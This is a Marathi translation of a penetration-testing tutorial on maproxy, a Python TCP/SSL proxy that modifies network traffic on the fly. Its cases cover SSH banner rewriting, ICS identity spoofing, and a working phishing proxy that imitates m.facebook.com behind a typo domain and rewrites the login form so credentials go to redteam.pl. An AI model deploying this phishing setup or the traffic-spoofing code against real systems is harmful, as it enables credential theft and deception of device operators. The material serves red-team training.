फ्लायवर नेटवर्क डेटावर प्रक्रिया करा

लेखाचा अनुवाद अभ्यासक्रम सुरू होण्याच्या आदल्या दिवशी तयार केला होता "पेंटेस्ट. प्रवेश चाचणी सराव".

सार

नियमित प्रवेश चाचणी आणि रेड टीम ऑपरेशन्सपासून ते IoT/ICS डिव्हाइसेस आणि SCADA हॅकिंगपर्यंतच्या विविध प्रकारच्या सुरक्षा मूल्यांकनांमध्ये बायनरी नेटवर्क प्रोटोकॉलसह कार्य करणे समाविष्ट आहे, म्हणजेच क्लायंट आणि लक्ष्य यांच्यातील नेटवर्क डेटामध्ये मूलत: अडथळा आणणे आणि बदलणे. आमच्याकडे वायरशार्क, Tcpdump किंवा Scapy सारखी साधने असल्यामुळे नेटवर्क ट्रॅफिक स्निफिंग करणे हे अवघड काम नाही, परंतु नेटवर्क डेटा वाचण्यासाठी, तो फिल्टर करण्यासाठी, बदलण्यासाठी आमच्याकडे काही प्रकारचा इंटरफेस असणे आवश्यक असल्याने बदल करणे हे अधिक श्रम-केंद्रित कार्य असल्याचे दिसते. ते फ्लायवर आणि जवळजवळ रिअल टाइममध्ये लक्ष्य होस्टकडे परत पाठवा. याव्यतिरिक्त, असे साधन स्वयंचलितपणे एकाधिक समांतर कनेक्शनसह कार्य करू शकले आणि स्क्रिप्ट वापरून सानुकूल करता आले तर ते आदर्श होईल.

एके दिवशी मला एक साधन सापडले maproxy, दस्तऐवजीकरणाने मला ते पटकन स्पष्ट केले maproxy - मला जे हवे आहे. ही एक अगदी सोपी, बहुमुखी आणि सहज कॉन्फिगर करता येणारी TCP प्रॉक्सी आहे. मी हे साधन अनेक समांतर कनेक्शन हाताळू शकते की नाही हे पाहण्यासाठी ICS उपकरणांसह (जे भरपूर पॅकेट तयार करतात) बऱ्याच जटिल अनुप्रयोगांवर तपासले आणि साधनाने चांगली कामगिरी केली.

हा लेख फ्लाय वापरून नेटवर्क डेटावर प्रक्रिया करण्यासाठी तुमची ओळख करून देईल maproxy.

विहंगावलोकन

उपकरणे maproxy Python मधील लोकप्रिय आणि परिपक्व असिंक्रोनस नेटवर्किंग फ्रेमवर्क, Tornado वर आधारित आहे.

सर्वसाधारणपणे, ते अनेक मोडमध्ये कार्य करू शकते:

• TCP:TCP - एनक्रिप्ट न केलेले टीसीपी कनेक्शन;
• TCP:SSL и SSL:TCP - वन-वे एनक्रिप्शनसह;
• SSL:SSL - द्वि-मार्ग एनक्रिप्शन.

ते लायब्ररी म्हणून येते. द्रुत प्रारंभासाठी, आपण मुख्य प्रतिबिंबित करणाऱ्या फायली उदाहरणे वापरू शकता लायब्ररी कार्ये:

• all.py
• certificate.pem
• logging_proxy.py
• privatekey.pem
• ssl2ssl.py
• ssl2tcp.py
• tcp2ssl.py
• tcp2tcp.py

केस 1 - साधी द्विदिशात्मक प्रॉक्सी

आधारीत tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()

मुलभूतरित्या ProxyServer() दोन युक्तिवाद घेते - कनेक्शन स्थान आणि लक्ष्य पोर्ट. server.listen() एक युक्तिवाद घेते - येणारे कनेक्शन ऐकण्यासाठी पोर्ट.

स्क्रिप्ट कार्यान्वित करणे:

# python tcp2tcp.py

चाचणी चालवण्यासाठी, आम्ही आमच्या प्रॉक्सी स्क्रिप्टद्वारे स्थानिक SSH सर्व्हरशी कनेक्ट करणार आहोत, जे यावर ऐकते 2222/tcp पोर्ट आणि मानक पोर्टशी जोडते 22/tcp SSH सर्व्हर:

स्वागत बॅनर तुम्हाला सूचित करतो की आमच्या उदाहरण स्क्रिप्टने नेटवर्क रहदारी यशस्वीपणे प्रॉक्सी केली आहे.

केस 2 - डेटा बदल

दुसरी डेमो स्क्रिप्ट logging_proxy.py नेटवर्क डेटाशी संवाद साधण्यासाठी आदर्श. फाइलमधील टिप्पण्या वर्ग पद्धतींचे वर्णन करतात ज्या तुम्ही तुमचे ध्येय साध्य करण्यासाठी सुधारू शकता:

सर्वात मनोरंजक गोष्ट येथे आहे:

• on_c2p_done_read - क्लायंटपासून सर्व्हरकडे जाताना डेटा रोखण्यासाठी;
• on_p2s_done_read - उलट.

सर्व्हर क्लायंटकडे परत येणारा SSH बॅनर बदलण्याचा प्रयत्न करूया:

[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]

स्क्रिप्ट कार्यान्वित करा:

तुम्ही बघू शकता, क्लायंटची दिशाभूल झाली कारण त्याच्यासाठी SSH सर्व्हरचे नाव बदलले होते «DumnySSH».

केस 3 - साधे फिशिंग वेब पृष्ठ

हे साधन वापरण्याचे अंतहीन मार्ग आहेत. यावेळी रेड टीम ऑपरेशन्सच्या बाजूने अधिक व्यावहारिक गोष्टींवर लक्ष केंद्रित करूया. चला लँडिंग पृष्ठाचे अनुकरण करूया m.facebook.com आणि मुद्दाम टायपोसह सानुकूल डोमेन वापरा, उदाहरणार्थ, m.facebok.com. प्रात्यक्षिक हेतूंसाठी, आपण असे गृहीत धरू की डोमेन आमच्याद्वारे नोंदणीकृत आहे.

आम्ही आमच्या पीडित प्रॉक्सी आणि फेसबुक सर्व्हरवर एसएसएल स्ट्रीमसह एनक्रिप्टेड नेटवर्क कनेक्शन स्थापित करणार आहोत (31.13.81.36). हे उदाहरण कार्य करण्यासाठी, आम्हाला HTTP होस्ट शीर्षलेख पुनर्स्थित करणे आणि योग्य होस्टनाव इंजेक्ट करणे आवश्यक आहे आणि आम्ही प्रतिसाद कॉम्प्रेशन देखील अक्षम करू जेणेकरून आम्ही सामग्रीमध्ये सहज प्रवेश करू शकू. शेवटी आम्ही HTML फॉर्म बदलू जेणेकरून लॉगिन क्रेडेन्शियल आम्हाला Facebook च्या सर्व्हरऐवजी पाठवले जातील:

[…]
def on_c2p_done_read(self,data):
 # replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response
     data = data.replace("action="/mr/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

अखेरीस:

तुम्ही बघू शकता, आम्ही मूळ साइट पुनर्स्थित करण्यात यशस्वीपणे सक्षम होतो.

केस 4 - इथरनेट/आयपी पोर्टिंग

मी बऱ्याच काळापासून औद्योगिक उपकरणे आणि सॉफ्टवेअर (ICS/SCADA) हाताळत आहे, जसे की प्रोग्रामेबल कंट्रोलर्स (PLC), I/O मॉड्यूल, ड्राइव्ह, रिले, शिडी प्रोग्रामिंग वातावरण आणि बरेच काही. हे प्रकरण ज्यांना औद्योगिक गोष्टी आवडतात त्यांच्यासाठी आहे. अशा सोल्यूशन्स हॅक करण्यामध्ये नेटवर्क प्रोटोकॉलसह सक्रियपणे खेळणे समाविष्ट आहे. खालील उदाहरणात, तुम्ही ICS/SCADA नेटवर्क रहदारी कशी सुधारू शकता हे मी दाखवू इच्छितो.

यासाठी तुम्हाला खालील गोष्टींची आवश्यकता असेल:

• नेटवर्क स्निफर, उदाहरणार्थ, वायरशार्क;
• इथरनेट/आयपी किंवा फक्त एक एसआयपी डिव्हाइस, तुम्ही शोदान सेवा वापरून शोधू शकता;
• आमची स्क्रिप्ट यावर आधारित आहे maproxy.

प्रथम, CIP (कॉमन इंडस्ट्रियल प्रोटोकॉल) कडून विशिष्ट ओळख प्रतिसाद कसा दिसतो ते पाहू:

इथरनेट/आयपी प्रोटोकॉल वापरून उपकरण ओळख पूर्ण केली जाते, जी औद्योगिक इथरनेट प्रोटोकॉलची वर्धित आवृत्ती आहे जी CIP सारख्या नियंत्रण प्रोटोकॉलला गुंडाळते. स्क्रीनशॉटमध्ये दिसणारे हायलाइट केलेले आयडी नाव आम्ही बदलणार आहोत "इथरनेटसाठी NI-IndComm" आमची प्रॉक्सी स्क्रिप्ट वापरून. आम्ही स्क्रिप्ट पुन्हा वापरू शकतो logging_proxy.py आणि त्याचप्रमाणे वर्ग पद्धतीत बदल करा on_p2s_done_read, कारण क्लायंटवर वेगळे ओळखीचे नाव दिसावे असे आम्हाला वाटते.

कोडः

[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response

 # Checking if we got List Identity message response
     if data[26:28] == b'x0cx00':
         print('Got response, replacing')
         data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
     super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

मूलत:, आम्ही दोनदा डिव्हाइस ओळखीसाठी विचारले, दुसरा प्रतिसाद मूळ होता आणि पहिला प्रतिसाद फ्लायवर सुधारित केला गेला.

आणि शेवटचा

माझ्या मते maproxy एक सोयीस्कर आणि सोपे साधन, जे Python मध्ये देखील लिहिलेले आहे, त्यामुळे मला विश्वास आहे की तुम्हाला देखील ते वापरून फायदा होऊ शकतो. अर्थात, नेटवर्क डेटावर प्रक्रिया करण्यासाठी आणि सुधारित करण्यासाठी अधिक जटिल साधने आहेत, परंतु त्यांना देखील अधिक लक्ष देणे आवश्यक आहे आणि ते सहसा विशिष्ट वापरासाठी तयार केले जातात, उदा. मुरैना, मोडलिष्का किंवा evilginx तिसऱ्या सारख्या प्रकरणांसाठी, किंवा सोफा शेवटच्या केससाठी. एक मार्ग किंवा दुसरा, मदतीने maproxy उदाहरण स्क्रिप्ट अतिशय स्पष्ट असल्यामुळे तुम्ही नेटवर्क डेटा इंटरसेप्ट करण्याच्या तुमच्या कल्पना त्वरीत अंमलात आणू शकता.

विंडोज एडी मध्ये प्रमाणीकरण यंत्रणेची चाचणी करणे

स्त्रोत: www.habr.com